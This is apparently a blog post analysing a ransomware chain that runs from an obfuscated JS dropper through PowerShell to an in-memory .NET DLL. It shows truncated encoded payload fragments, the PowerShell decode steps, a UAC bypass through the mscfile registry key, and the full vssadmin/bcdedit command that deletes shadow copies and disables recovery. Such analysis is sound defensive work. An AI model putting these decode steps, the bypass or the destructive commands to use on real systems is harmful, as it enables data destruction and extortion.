Ransomware via net assemblies

RANSOMWARE VIA ASSEMBLIES

SUMMARY:

[CLICK TO CHECK OUT OBFUSCATION / STAGES]

• User visits a compromised web site and clicks on a malicious link A compressed file is downloaded
• User gets an alert (Open file?)
• A heavily obfuscated JS file is executed via WSCRIPT WSCRIPT spawns powershell
• Powershell de-obfuscates an assembly and load it in the memory Assembly / DLL has another DLL embedded within
• 2nd stage DLL is loaded in the memory as well Compmgmtlaunch.exe is spawned (to bypass UAC)
• Powershell encrypts files via in-memory assembly
• CMD.exe is spawned to delete the shadow copy via VSSADMIN.exe Ransomware note is displayed

The document includes analysis of multiple layers of obfuscation used by the ransomware

THE ENTRY POINT

In this situation a JS file is the entry point. its a heavily obfuscated file with a lot of garbage code.

JS File talks to multiple IP addresses, most probably compromised domains

The JS file puts together a tmp file. This file is delimited by ‘!’

Next the payload runs powershell to formulate the next stage payload.

[System.IO.File]::ReadAllText(‘C:\Users\foo\jbsvpi.tmp’)).Replace(‘!’,’’)

On de-obfuscation, we get the following (Not all text is included)

Start-Sleep -s 32; [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(“JABFAG4AQwBvAEYAaQAgA D0AIABAACcADQAKADcATAAwAEwAZABLAHYAWgBkAFIANQAyAHkASABzAHYAZQBjAGwANwA3AD QAeQB1ADcAbQBoAG0ASgBJACsAbABrAFUAZQBQAGkAYQBBAFoAdgBzAEMAWABxAHIAcgBDAGsAdw BRAEoARQBBAEIASgA4AEcAVQA3AFYAeQBBAEIAZwB1AEEARAA0AEEAVgBBAGcAdQBSAEkAagBoAF MAMQBxAHUAdgBXAHMAVgBXAHIAbABoADAANwBYAGIARwBUADEAbgBGAHIAdQAxAGEAVwBWA CsASQA2AHIAUwBOAFgAYQBhAHkAMABjAFcAdAAxADMASwBhAEoAYgBXAFYAUwB4ACsANQB5ADA AcABVADQAcwBkAHYAWQBxAFQAdgBxADMAdAAvAGUANQA1AHcAZgA0AEgAOQBIAG8AOQBoAFoA cQA2AHYATAB1AHAAcQBmACsAQgAvAG4AdABjADgAKwArADMAMwAyAHkAZQAxADgAagA3AGwAa ABqAEwAbABKAC8AMwAzADEAcQA4AGIAOABqAEoASAAvAGYAYwBSADgANwBmADkAOQBnAHYAN QA3ADQAbAAwAC8AKwA0AFQANQA2AFoARgBmAGYAUABmAFAARABHAFIALwA4AGQAMwByAEIAL

wBYADIAOAA2AGUAdABaAHEAMQBWAFAAbgBsACsAcgA5AHgAbwBOAEQAdgBQADcAMQBhAGYAYg A1ADAAMQBuAHEAOAAzAG4AawAvAG0AMQA1ADQALwBhAFYAYQBxAEwAOQArADcATgAvAG8AZQ ByAGEATwBRAE0AaQBZADcAYwBNAE8AOAA4AEoAVwAvADkANgAyADIAMwB0AGYATQA0AEwAdgB2

AEQATgB3AHgANQBqADgAYgBOAFcAWgBJAG4A ...

The above payload is de-obfuscated to the following.

$EnCoFi = @' 7L0LdKvZdR52yHsvecl774yu7mhmJI+lkUePiaAZvsCXqrrCkwQJEABJ8GU7VyABguAD4AVAguRIjhS1quvWs VWrlh07XbGT1nFru1aWV+I6rSNXaay0cWt 13KaJbWVSx+5y0pU4sdvYqTvq3t/e55wf4H9Ho9hZq6vLupqf+B/ntc8++332ye18j7lhjLlJ/331q8b8jJH/ fcR87f99gv574l0/+4T56ZFffPfPDGR/8d 3rB/X286etZq1VPnl+r9xoNDvP71afb501nq83nk/m154/aVaqL9+7N/oeraOQMiY7cMO88JW/ 96223tfM4LvvDNwx5j8bNWZInr3+Jfr9PL8c5du34Peg9

NsY/9c8fwfP+X83zEf+Hf6U/+//uj/ 4309RvctG6v3+wbBR3jF33wQsrv2P+nc7cHub7hcD9y93qhcd7veP6bh4rH3t0+OPvtxqt/boN/rGY+eB/vhoz3cf of+/3KoeN+nDu9pn1PVT176L93fztS/JN9y3QXPL/MOIMX/7h0aBE/8q/3swfsM8QX8HjLlvBt+5O/ jOvY9+eTRihj4g755DO/Tu6dHIE2ZwaOvG0NbCqhl ...

We are not quite there yet, so bear with me. This pattern is decoded by

IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EnCoFi), [IO.Compression.CompressionMode]::Decompress).

It acts on byte array i.e. 700928 bytes

Let’s continue to decode this layer (System.IO.Compression.DeflateStream). Now

we get the following, which means we still got more to decode :)

77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 35 222 218 92 0 0 0 0 0 0 0 0 224 0 2 33 11 1 11 0 0 170 10 0 0 6 0 0 0 0 0 0 254 200 10 0 0 32 0 0 0 224 10 0 0 0 0 16 0 32 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 ...

We can clearly see that there are way too many levels of obfuscation but its getting easier now. All we got to do with the above payload is to get the character representation for each integer value. After decoding we get DLL. In .Net world, code is compiled to IL executable, DLL or an assembly. Then it creates a stub for each class. Eventually the stub passes its address to JIT compiler. JIT compiles everything to machine code. Assembly is the basic packaging unit in .Net. An assembly could be an exe, a DLL, a single file or a metafile file.

So we got a DLL / assembly that is loaded by powershell.

SHA256: 6de15bd033be912148962eef88b08e29d04f5272e2f454a350076d0c62c5e600

This DLL has a class called ‘Test’ and a method called Install1

public static class Test { ...

It uses Test.MemoryLoadLibrary (BINARY STRING) to launch another assembly!!!!!

Here is the final DLL.

SHA256: 03a256ec2af4355194f494a987358c0fa9e635987b8c7b8ec3731fba8e5e443a

LOADING ASSEMBLIES:

Powershell will use [Test]::Install1() to load the assembly, where Test is the class name and Install is the method name.

AND THE FUN BEGINS:

Payload drops a .bmp image

SHA256: 34cbe464ded497a11d48817b07bf0c86cafb7f331c96c712e80663aa8afd7904

BYPASSING UAC:

Payload queries the registry by using the following functions

RegQueryValueExA

RegOpenKeyExA

It looks for:

Software\\Classes\\mscfile\\shell\\open\\command\\

After making modifications it uses ShellExecuteExA() to launch

C:\Windows\System32\CompMgmtLauncher.exe

It then uses CheckTokenMembership() to check the access token.

PAYLOAD EXECUTES THE FOLLOWING COMMANDS:

• C:\Windows\explorer.exe C:\Windows\System32\CompMgmtLauncher.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
• C:\Windows\System32\CompMgmtLauncher.exe
• consent.exe 940 358 000000000421F180
• C:\Windows\system32\mmc.exe C:\Windows\system32\compmgmt.msc /s C:\Windows\System32\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures vssadmin.exe Delete Shadows /All /Quiet
• C:\Windows\system32\vssvc.exe
• C:\Windows\explorer.exe C:\Windows\System32\CompMgmtLauncher.exe

CompMgmtLauncher (Computer Management Snapin Launcher) loads a third party DLL’s if registered in registry location: SOFTWARE Classes -> shellex

I am guessing this would work on windows build that is older than 15063.

FILE ENCRYPTION:

File encryption continues from powershell’s address space. Files are encrypted with AES256 and the keys are encrypted with RSA (public key). Victim buys the private key from the hacker. Files are encrypted with .1y0pw7 extension. Wallpaper is changed to

RANSOM NOTE:

I am not sure why the note starts by saying “Welcome again”. Maybe the hacker is in the habit of compromising victim(s) more than once

LET’S LOOK AT THE OVERALL FLOW FLOW

CONCLUSION:

Its clear that the hackers are getting smarter by the day. They are using legitimate tools that could by-pass multiple security layers. I am sure they QA their work as well. Most of the attacks are staged into multiple layers of obfuscation. Payloads could be loaded in the form of assemblies by using tools like powershell. This means that the actual payload EXE is running in powershell address space. I am not sure if AV vendors can do much against such attacks.

STAY AWAY FROM RANSOMWARE